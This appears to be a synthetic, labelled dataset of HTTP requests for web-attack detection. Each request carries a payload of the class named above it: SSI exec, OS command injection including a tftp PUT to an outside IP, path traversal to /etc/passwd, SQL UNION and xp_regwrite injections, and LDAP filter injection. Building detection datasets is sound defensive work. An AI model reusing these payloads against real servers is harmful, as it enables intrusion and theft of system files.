~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38604
Start - Id: 39660
class: SSI
GET /FFzbAIt61zIxmlN/rawh9rfsumijchmi/unwa/niUwuFfqZ@SnGUExCp/n3l.-OQ/eiiwilchse/gDUgJ/1X/HtddLyhesruy/ahiaNrphf/a0e3a4ueuoo/position2lZbC.jpg?f4tinol=rcn&0fnetcatWTO=%3C%21--+++%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E HTTP/1.1
Host: www.braot8eyno.net
Connection: keep-alive
Accept: image/*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 48.57.34.71
Cookie: xopetx4ileralwv=jeEoaaracih;nodu=636
Cookie2: $Version="811"
Date: Mon, 28 Nov 05 03:31:58 CET
ETag: W/"DjzoEKQNI9ad3TMI8QLe"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Wed, 09 Feb 05 13:16:29 CET
If-Unmodified-Since: Mon, 17 Mar 08 14:02:26 UTC
If-Match: "B@3VoxY.xDKOy5mo"
If-None-Match: *
If-Range: Tue, 23 Sep 08 05:26:30 CET
Max-Forwards: 689
MIME-Version: 3.9
Pragma: a=yboSa
Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Basic YnRlczpuc29lcGNlMg==
Range: -7190
Referer: /orew/nwirmete/vmohsa/nlilhss/nnEEt.jsp
TE: chunked;q=0.2
Trailer: Date
User-Agent: Mozilla/8.2 (Machintosh; U; Mac OS X 1.0; ht-Tm; rv:5.3.4) Gecko/10748186
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8969x195
Via: oay/2.8 www.ahDn.css
Transfer-Encoding: gzip
Upgrade: iw6k/3.2, ans3Du/7.4, m5dr/5.3
Warning: 273 www.Sneje.htm "srzSNAitebchch" "Mon, 20 Dec 04 23:29:19 UTC"
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39660
Start - Id: 43577
class: OsCommanding
GET /yrTHGJfw3/0S3kky7nodeDyHm_zT/mLb0dbetweenFW/fICftjSEYIHi/tFflUA0/o3j7Z9yiS@/mxg8Hz--G/c8cwJ9/aOHy6/dST.aspx?nn6aezshsare=49767585&yseooleed=znrsio0xhe&AMiframebh6phpRq2e=ie&aTioDhnh=jxbgAOnv&slrecef3ooettd=esselect%24&vi0iebieetx=we2hod&mR1b.3X=nxSV8D&crTm=+++++%3B+echo++++++%3B+w+++%3B+uname++++-a++++++++%3B++id HTTP/1.1
Host: www.r4yka25r7.de:7
Connection: close
Accept: */*
Accept-Charset: euc-tw;q=0.8, iso-8859-8-i, x-mac-roman;q=0.2, x-mac-chinesetrad;q=0.7, iso-2022-jp;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: 0igosn9-eosk7a;q=0.3, incfm-n, nop-I, slee-nLslyi;q=0.0, 9iE9-hP;q=0.7
Cache-Control: max-age=08794
Client-ip: 128.137.178.143
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="95"
Date: Mon, 09 Aug 04 09:04:47 UTC
ETag: "z@VDwv-LBAonIc6"
Expect: nhNcolo
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sun, 25 Jun 06 04:37:30 UTC
If-Unmodified-Since: Mon, 01 May 06 19:54:17 UTC
If-Match: *
If-None-Match: *
If-Range: "wFGwu6f1XA-FIRqrK9c"
Max-Forwards: 6245
MIME-Version: 0.2
Pragma: gn5dym=wVmenor
Authorization: Basic cDBzbmVwOmZ5c3Rj
Range: 08647-744
Referer: http://rrn7t.it/1tbrAs/shlldsu/ercit/gtEiexme.swf
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.3 (Windows; U; Windows NT 8.6; ie-st; rv:3.9.0) Gecko/31517700
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 1267x2165
Via: lrQn/9.7 www.1utl.shtml
Transfer-Encoding: gzip
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43577
Start - Id: 37687
class: LdapInjection
POST /U1wgetz1uRNVc03/al_LXRH7ModDhNB/-k@1n/3SXzVS8i06PZxcsjoozE.mdb? HTTP/1.1
Content-Length: 195
Content-Language: slnjtaa,qoeo6,e
Content-Encoding: deflate
Content-Location: http://www.2heheit.de/et5d/iuls2/iewaqcw/aHnTl.php
Content-MD5: MnRhdVRudWFuaWxuaXJocw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 23:35:57 UTC
Last-Modified: Sat, 09 Oct 04 22:00:04 GMT
Host: 48.39.109.71
Connection: nTtt8han
Accept: application/*, text/html;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: rhsdMi-qre2st
Cache-Control: no-transform
Client-ip: 28.10.194.170
Cookie: qXrI-3w=a &fsam;alit=46qoNneEiqso;gmmwOSEnh=7esc;rs=ttesIgarph;udNs1aaaaxutpes=275855529;hldLewei=2GxF3T
Cookie2: $Version="01"
Date: Sun, 30 Mar 08 10:27:24 CET
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Sun, 24 Oct 04 08:48:17 GMT
If-Unmodified-Since: Tue, 07 Aug 07 12:24:47 UTC
If-Match: "a6LheQf808QtO5v"
If-None-Match: "gv4UFAO-hQSPizwFW"
If-Range: Mon, 08 Jan 07 05:23:20 GMT
Max-Forwards: 040
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM SWlzM250b2VobmFpc3Jlb2Exb3RnaXpnaU5vYm1ucmVyYmQ5aU5FRGhzY3JqZGs=
Authorization: Digest qop=auth
Range: 6058-6,88-,-245437
Referer: /6eSh4/eoramuE.jpeg
TE: chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.5 (compatible; ltmSi; Win 9x; he7e7ej)
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 940x1719
Via: 5.4 14.221.56.180:8854, HTTP/9.6 www.4meeby9v.htm:25
Transfer-Encoding: compress
Upgrade: ldon/1.3, oeCc/5.2, eia/8.5, wqT/7.2
Warning: 355 www.dT68.js "3Sthowaroorcrdfemtte" "Tue, 02 Mar 10 18:12:18 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nnd1eeearifo=orwget4r&EaJND.KCA=asg&rhectjesnOettln=bS5yG&ageWnuhwt=y&w3.gi2=89ddiainsnoo$u&ns=matTr/F6s r4oo&nigahtars=")(targetfilter=(o=NetscapeRoot))&hZI@lGOSL7bb=ntv&on=2

End - Id: 37687
Start - Id: 41654
class: SqlInjection
GET /tMupdatexaidelete/e2WPV/nXcDwnCMX4Tvzf/rAxsKQSmvp80/aikf3oi/ueicmiEewo4ehle/C9bm/gjMev.jpg?rtn=4lb1&Itoar1io7esinfe=culORM%40zT&ieiiy=03&ieas25=22&lreasmht8R=775&goonpiee=lAjto%5Daefromt0+&R-ZKUrILW=%27++++%29+UNION+++++ALL+++++SELECT+++++rpesji+++%2C+++tnTWao++%2C++at++FROM++Rlij+WHERE+emeS+++NOT+++IN+++++%28%27Ea%27%29+++AND++Eb9chsistk+++++NOT+IN++++%28++%277lsmwdte%27+%29+++AND++%27%27++%3D+%27&aL1ydbG1IYX=eltsh&httpsLE9VZ=185353&eejilmI=378876&s4heommOrimue=eby1mhbsase4x0isuA&datvphrot31shtq=vALDPpoJ HTTP/1.1
Host: www.oosnmq2.com
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: isiri-3342, euc-cn;q=0.4
Accept-Encoding: deflate, deflate, identity;q=0.8, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 190.249.107.19
Cookie: z_36E4Q=irl~oeiu0o]htfxr phpp;tp=8027
Cookie2: $Version="0"
Date: Thu, 01 Mar 07 08:00:09 GMT
ETag: W/"tK08tBHPggtEMtZ1I-o"
Expect: tt48=sne4our
From: rgcs0@a7Cesos0.be
If-Modified-Since: Fri, 07 Jan 05 04:28:03 UTC
If-Unmodified-Since: Thu, 16 Sep 04 23:48:45 UTC
If-Match: "kuCO08u3.sj9VMq6A_"
If-None-Match: *
If-Range: *
Max-Forwards: 2706
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bW9zbzZtbGVydGMyZXM3RW1vaXRSNGR1b2hyem51ZXY=
Authorization: eaoes1 nieeosb=otusaf
Range: 0-,-4,4860-288700
Referer: /reef.php4
TE: gzip;q=0.8,trailers,chunked
Trailer: Trailer
User-Agent: hueLnrn/0.1.4.1.1
UA-CPU: MIPS
UA-Disp: 942,8019,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: 9.5 www.Rhaai.js
Transfer-Encoding: compress
Upgrade: eelO/2.0, utnt/9.3, aSn/6.5
Warning: 891 153.235.102.59 "cOto1fzuiSiEocefsa" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41654
Start - Id: 40766
class: SSI
PUT /woLj/lkWwA@9U37.Mq_bTQ/tg/blaahoews4vone/oumhnestoEeas/Y@h5select/9caxaNCDvposition4/iocityeShguwo1.tiff? HTTP/1.0
Content-Length: 388
Content-Language: unnHiu
Content-Encoding: deflate
Content-Location: http://www.ddoO.uk/6iSWtsw/anut/ehtdtn/euhsi/cep3oct.tar
Content-MD5: ZWdodGJkQXV0ZXRhc2lvcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Feb 04 12:58:49 CET
Last-Modified: Fri, 11 Jun 04 23:37:49 UTC
Host: www.smrlR.net
Connection: keep-alive
Accept: video/quicktime;q=0.3, video/*, application/zip
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: Oaec-e, swh-h5s2k2k, p9nb-h6he5, s-qsohc;q=0.4, pt-xeGS0oON
Cache-Control: no-cache
Client-ip: 166.41.33.129
Cookie: holsbfje=rinlmm14tabrcpahm;othrnoiew25af8h=sgaulhoHTtie1a
Cookie2: $Version="05"
Date: Fri, 02 Jul 04 05:31:56 CET
ETag: "-mDaC72APAXSOUm"
Expect: neiat
From: tt33en@1osNNfn.biz
If-Modified-Since: Tue, 11 Dec 07 05:32:55 UTC
If-Unmodified-Since: Sun, 10 May 09 07:45:20 CET
If-Match: "3ZgQE1_cCBmM-6Iey@"
If-None-Match: "z0laz.ruwPweKf_QTK"
If-Range: Sun, 15 Aug 04 17:17:46 CET
Max-Forwards: 0930
MIME-Version: 8.0
Pragma: rse='8'
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: cOss ctpiFe=shtetAe
Range: 07-9,0-,-333
Referer: http://www.tina.org/siRNrna/wtiosa/td32srse/wlIei/dtTfibaA.cgi
TE: trailers,chunked;q=0.4
Trailer: Max-Forwards
User-Agent: t58i/2.2.7.9
UA-CPU: 68000
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: HTTP/0.7 www.Riien.html, HTTP/0.6 242.90.253.133, CSDd/5.6 208.231.126.171
Transfer-Encoding: s0et
Upgrade: rhe/3.3
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

lsnooieygntln=4516951&rpahaevsr3bt=zitiptutdzqgdh&sNbscetoEmo8d=eZjDT&9dsneAerstsayc=879008&7taIeiynhr=<!--  #odbc    connect="4oir,ttera4,otnb"      statement="select *   from 92"-->&0thges=3tarl7em4esbt&invcssr9e9tw=wIoletAsntTz&teSdf=stelneteet1scseoghttpsai&iSu3sl3bt=rbin/&vpepnCoVlohnke=126710037&sDOJ7Sxrcpfh2=etY/xcnslaaBt&o66d=409795893&wstatlf=dfo1nt

End - Id: 40766
Start - Id: 39991
class: SSI
GET /l0.js?s6d=neIeElIue&ooeo=842&eb=9lsh6a4rQbJ&afro0hkwpiaon=e&eqimAu7hohOiszd=22377937&WeunjVtfarmca=oB3Gw&e3waoltdotjn5se=6aXOVpo&eoe2haeat=01644&delete_iDaD=asnT0etuxie2eac&odYoyst=iwmailnsmreLnk+6e-sn+e%5C&h7leic=ytui1aie&OwbandXuK=%3C%21--%23exec+++++cmd%3D%22%2Fbin%2Fls++++-l++%2Fhome%2Fseh1so%2Fbclgngnin%22+--%3E&Sin4ie8r=s0a&i9hic=etljrsie HTTP/1.1
Host: 50.217.85.70
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: lgo='atarhaB'
Client-ip: 0.179.99.133
Cookie: docsurmmgo6a=seWA1MpM2A;aqceitnnta=waey
Cookie2: $Version="941"
Date: Mon, 31 Jan 05 08:02:51 GMT
ETag: "Y5G0r-gDV1rDCTn"
Expect: 100-continue
From: 5iWxsCt@nr6efecsn.de
If-Modified-Since: Thu, 21 Jul 05 06:20:02 CET
If-Unmodified-Since: Wed, 26 Dec 07 10:38:25 UTC
If-Match: "UM5lK2RzNYZxvVlh"
If-None-Match: "9a-dDsrLxzgaIaW2"
If-Range: Mon, 20 Feb 06 15:32:16 GMT
Max-Forwards: 1
MIME-Version: 3.3
Pragma: kca='vNp'
Proxy-Authorization: NTLM NlQ2YWhtdWl0dGR2TGxlem9OZW50dG9vaXI5VTVicmlzc2xnbm9rZW9sdGVuZWU=
Authorization: Digest realm
Range: 618-573,4-,461-
Referer: http://tnfarpH.ch/ydeMpx.pdf
TE: deflate;q=0.6,deflate,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.3 (Machintosh; U; Mac OS X 5.1; rL-ye; rv:9.0.4) Gecko/25314887
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 860x1351
Via: 0.7 www.7yywai.js, acRts/9.7 98.22.82.136
Transfer-Encoding: deflate
Upgrade: sdsn/9.0, uilud/8.5, 5iaeew/4.1, TeH/9.8
Warning: 144 202.212.126.14 "EZtzaaiitexz9rs" 
X-Serial-Number: 18116
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39991
Start - Id: 43517
class: OsCommanding
GET /wth_kTbtkzfOY.phq9N/p1Lx/y9h/3UD/CQ2/ms0ti/aN5orYGoOH/iLiFlTpI3DYlbWVHycx/rLThTTbh2.VBWqx-TsaJ/ssSBm9A/emgiNR/telnetbinFiksqMaccess_log.pl?3ey=svatehUeat%2Fd&ttEaefenpeoemsr=268421&bl=9291239&a3=ncCstwrcos36qu&Yatiee=wOaco&Nd2r37bGtueuiE=O%2Ff&h3a=81260637&ols=iWIPu6BOzl&eoibtpn=nn0ybody%3Faa%3Df&A7PnLh=%27%3Bps++++-aux+%3B&ltn9tssLm=qodoo1mnexecs&uh8ld=cgTEKBt&Etdtsoc1wsii=7460 HTTP/1.1
Host: www.osBinsr.it
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1253;q=0.8, iso-8859-8, x-mac-greek, euc-kr;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: o-eOthte5
Cache-Control: min-fresh=480
Client-ip: 108.184.195.217
Cookie: aqsrot=dBGf_d8Tx;9bhPBvI=neldehdfetiedi;aq=1517513014
Cookie2: $Version="38"
Date: Fri, 23 Feb 07 11:54:29 CET
ETag: W/"Zr8Kjg7ZWDV9.yBsHLBU"
Expect: 100-continue
From: ioojil@heyq.net
If-Modified-Since: Thu, 13 Nov 08 11:46:17 UTC
If-Unmodified-Since: Tue, 19 Sep 06 24:43:00 UTC
If-Match: *
If-None-Match: "H4rSj8SPBuZY_weZA9"
If-Range: Tue, 01 Jun 04 19:50:49 UTC
Max-Forwards: 1111
MIME-Version: 5.5
Pragma: mrt=ct2to
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM bWhoaHdtUmNzc3B0b255c2Vvb2VlY2U0aGFyMWZ0bWFoZWdib2lh
Range: 41-,-475,4948-
Referer: http://www.asbif.uk/8eeHha/3Fll3/horoed.wav
TE: trailers,deflate;q=0.7
Trailer: Accept
User-Agent: Mozilla/0.6 (compatible; MSIE 4.7; Open BSD i386; hrdenfo; tXreLqR; cnnntnnw)
UA-CPU: PowerPC
UA-Disp: 308,529,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 473x8335
Via: FTP/6.8 www.Ihuamoh.tiff, 2.2 2.224.77.226:7866, HTTP/7.7 252.148.237.206:31710
Transfer-Encoding: rbhcon
Upgrade: tlle/3.2, ouiu/2.7, 6nb/4.0, iuoaC/4.5, ioatma/4.1
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 163.170.109.187
X-Serial-Number: 61216613
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43517
Start - Id: 46270
class: PathTransversal
GET /hAh1dzQU8SaL/UL4/acv88GvK.msf?3DX0=2.FEW&ozheahcogP=7125443307&ioga5Mi=cO%40P2Uw2hD9&uD1iblota=eina&tykibIaOsTts9=xganota&rSa7ts64wc=yeiosl&MznlocationKOadropV=rseedjdivPr&Zeu=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&nsIo=68&2kshhWlemtuedc=ec%2B%22%5C%22hA0gdropi%3Fee%298r HTTP/1.1
Host: www.at6n.ch:3907
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean
Accept-Encoding: identity
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 117.131.231.99
Cookie: kedEl=e~;te=tto;60iarnxblit6efs=apw
Cookie2: $Version="45"
Date: Fri, 22 Sep 06 09:41:04 CET
ETag: W/"zjbRV5pdy3nxjAnt"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sat, 18 Jul 09 09:43:05 CET
If-Unmodified-Since: Tue, 02 Mar 10 04:14:51 GMT
If-Match: *
If-None-Match: "KfGa4I33X5fXQmtG"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: Digest uri=http://jnnte.ch/cre5lhut/onigo/0t2iftsi/AfeeT.mpeg
Range: 77429-
Referer: http://2dy2fw.de/aaJzoo/azHuh/akon/eey8nors/ikaOsq7o.asmx
TE: gzip;q=0.8,chunked,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 2.0; qg-sv; rv:2.3.2) Gecko/11306543
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: HTTP/0.2 www.sRNsgg.html, ujfcs/2.6 www.sqyen.shtml, 7.3 www.8edleuoe.css:4
Transfer-Encoding: gzip
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46270
Start - Id: 44608
class: OsCommanding
GET /0ThPQigjwYPd/suo/re3d7y/ii58Bdmeftlseajyxn1/wruooh/ile0nuymo1yI/o332I/toT2lea3c/emsB/_EYlUCmocha_cmdOMklike.swf?hHtesoceeh6e=ej&tpbahrgl7Ai=rbinincluderrzmailnh%24hccI+nirdi&nab=1&ageh=89784965&phdrDesWr=79.65.196.144+++%7C+++tftp+++++-i++++132.4.249.218+++PUT+sam._&E4tbtD3ec5oe=window.openrywiUmxhavingMoo&hss5q=fp9hoc%3E&sZeesilennees84=5090&VYPv5JKgshutdown_=odoi HTTP/1.1
Host: 191.118.180.56
Connection: tmaOpTe
Accept: application/zip;q=0.7, text/plain;q=0.4, application/*
Accept-Charset: *;q=0.0
Accept-Encoding: identity, identity;q=0.9, compress;q=0.7, compress;q=0.1
Accept-Language: ea4-hh, sannobrh-0;q=0.1, ana-dhmdYo;q=0.0, Ar5-tfeTroaO;q=0.2, raiaai-d
Cache-Control: max-stale
Client-ip: 234.131.254.239
Cookie: Csaehdtthkjnhj=802;eci=626936;lmo=7;li5vaeT3sItggeu=10647
Cookie2: $Version="11"
Date: Sun, 14 Mar 10 19:35:05 GMT
ETag: W/"0iYg@SMqR@Wb_t3R"
Expect: demttN=0eEdcV
From: 8sf9@dbeln5gatO.gov
If-Modified-Since: Sat, 11 Jun 05 01:48:43 CET
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 1.7
Pragma: 1ctau='0u'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Ntiork yesrssnr=smegluuc
Range: 41676-
Referer: /noptnn/oecsr/nsA0hik/Eot9.aspx
TE: deflate
Trailer: Trailer
User-Agent: h4sAwau1a4
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/5.3 188.64.121.58
Transfer-Encoding: deflate
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44608
Start - Id: 36026
class: PathTransversal
GET /aWX-5/aKEZj1K.F1/r5nt7te8/dytdg1rcnct0/teIZ6JxxYIz.css?tkwdbhdeanaeq=8Ea&8ehe=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&388b_AorKls-=nae&n_nzV.vopt9ls-=ca+exec&rec=unioncz%3Dt HTTP/1.1
Host: www.iqrl1lnew.st
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-roman;q=0.0, iso-8859-1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 110.116.43.149
Cookie: tr=Rs1usuchleshrtoAn;o1l42netcat.8=mY@uX4Dxtm;dea=by8I;62J0UIVxtermX@Jimg=pE;kiclarod9n=ca+enstenl;c8Pf7U7@w=7gXlGxn5NGF.
Cookie2: $Version="5"
Date: Sat, 05 Sep 09 06:21:25 CET
ETag: "1a58EMborIstQSXjUbu@"
Expect: 100-continue
From: eahHqSh@pqrt.com
If-Modified-Since: Tue, 15 Apr 08 07:22:48 UTC
If-Unmodified-Since: Wed, 03 Aug 05 16:08:54 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Jul 09 16:36:31 UTC
Max-Forwards: 7012
MIME-Version: 3.0
Pragma: yr=en2n
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: Basic c2V0d2h0bDoxcmx5aQ==
Range: -05066,-92,-024075
Referer: /es6sa/A25huts/donda.php
TE: chunked;q=0.5
Trailer: User-Agent
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 2.8; ed-no; rv:5.1.0) Gecko/95001466
UA-Disp: 097,2396,8
UA-OS: Windows 95
UA-Color: color8
Via: 3.8 241.0.82.130
Transfer-Encoding: eeef
Upgrade: vki/8.2, ltp2/4.4, eeft/1.6
Warning: 341 181.125.130.56 "jenecjbHicooniain4f" "Thu, 13 Apr 06 16:57:19 GMT"
X-Forwarded-For: 99.130.22.61
X-Serial-Number: 83480
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36026
Start - Id: 38152
class: LdapInjection
GET /dsHey9VKW/onosrrhdteynnn/e6Neibdtpcpfaranbop/openO/jN@cj/mrSjklY_YT7udO/t2ceo7mIabesr.sh?HAasPs=8541&L9yJboot.iniz=1o&hsvlpsRnf=33&NiXECrmAN0RN=uAxjaeoricaeef&mr=rf%40E4fzqjK7F&hirnryhoN2aie8=3&8tNpcFH=%29+%28+%7C++++%28displayName%3Dhad*%29++%28name%3Dhad*+++%29%28+mail%3Dhad*++++%29&ea4FEszn=aei&6ct=94&oau=se5accepta++ln&tNisnpzz=nl8N&fO3HDav709Q=l1sZrh&N_m.group bygfrom.Ebin1=%2Bdsnrkdzplda0diIets-&eoe7=71995&arcUsydn5=66001 HTTP/1.1
Host: 193.75.55.186
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: echocYdm-T
Cache-Control: max-age=6
Client-ip: 106.203.232.28
Cookie: ceds=nzCoq;oh5irdt35ln5um=trst;7aser2=ee%u7a;zoTxzdmedpEr=7976849487;fkioa1acqsk2toS=c<croimeTh
Cookie2: $Version="9"
Date: Fri, 13 Feb 04 07:16:33 GMT
ETag: "Ptct44HXIkgtS5In"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Fri, 24 Feb 06 24:28:42 CET
If-Unmodified-Since: Fri, 27 Feb 09 07:06:25 GMT
If-Match: *
If-None-Match: *
If-Range: "9PlG9Wu1j1RbdupzU"
Max-Forwards: 990
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic YWVhbjplamVlY2hjbg==
Authorization: njtdo oiaHAsOe=InaIstei
Range: 652463-080254,-92,5914-088
Referer: /pxMxoi/astEAuI/bmal.ace
TE: gzip,gzip;q=0.4
Trailer: Proxy-Authorization
User-Agent: aLYPPUOTq http://www.leruHheu.uk
UA-CPU: StrongARM
UA-Disp: 651,9493,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9560x3335
Via: eys/5.7 www.Ee2qe.js, FTP/2.1 www.nw2e.css, 9.3 www.eonr1lzr.tiff
Transfer-Encoding: gzip
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 700 216.4.11.243 "oisttasyiausek4esAB8" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38152
Start - Id: 40982
class: SqlInjection
GET /0er22uag8yylicn6chg/exsptnaloloNain4ov/ctmeT7srOsnoeddHh7eh/u7ueu3gin/hcekroFH_Hps6JwE0LN.mdb?jlCljvde2meti=jaaC24&Rlouafa9rnrmTne=5535468221&oaewad=hnvnO&Dsddc=tolp&2ENhtl=egoEos1eps7qh5acr&Oh=e&a0ti=det&elneshdabtldofe=ss1tUvoE7connect&a4lu2dnieOtrh7=eg7UUb3W6ylb&qaIu=r%2Fh&to2estel2One=09725931&3ga75a0f6=27 HTTP/1.0
Host: www.hoarhroain.st:1
Connection: rtntbsfo
Accept: */*
Accept-Charset: x-mac-arabic;q=0.7, iso-2022-kr, windows-1254;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 63.118.232.21
Cookie: cser=watelnetevn;in=exec   xp_regwrite    'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','e1ra','REG_SZ','DBMSSOCN,hackersip,80'
Cookie2: $Version="57"
Date: Sat, 03 Dec 05 06:37:00 GMT
ETag: W/"3SEM@41N03GnazFlYR"
Expect: jlio=Bs1rhocw
From: rso1@lseLdehaua.biz
If-Modified-Since: Tue, 20 Jan 04 21:57:56 UTC
If-Unmodified-Since: Sun, 03 Jan 10 01:30:32 UTC
If-Match: *
If-None-Match: "VVlEfj0XAo6sO-zI"
Max-Forwards: 0
Pragma: no-cache
Authorization: NTLM NXVib3NyTnR0ZTBlbmFvaVhvaXhqbmtlaG93aWVqM29paWxubklzZnRheA==
Range: 462-,-89,25-
Referer: http://www.wuses.fr/tN6Sa.jsp
TE: trailers,trailers
Trailer: Authorization
User-Agent: metrObdt/4.9.3.0
UA-CPU: x86
UA-Disp: 789,1758,32
UA-OS: Win95
UA-Color: color8
Via: FTP/4.3 www.edig.tiff:4, HTTP/8.7 92.10.66.78
Transfer-Encoding: identity
Upgrade: boi/5.8
Warning: 455 www.sliflg.jpg "eyfiunfe9Mutu" "Wed, 31 Jan 07 12:29:53 UTC"
X-Forwarded-For: 29.238.23.108
X-Serial-Number: 34472736
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40982
Start - Id: 47798
class: XSS
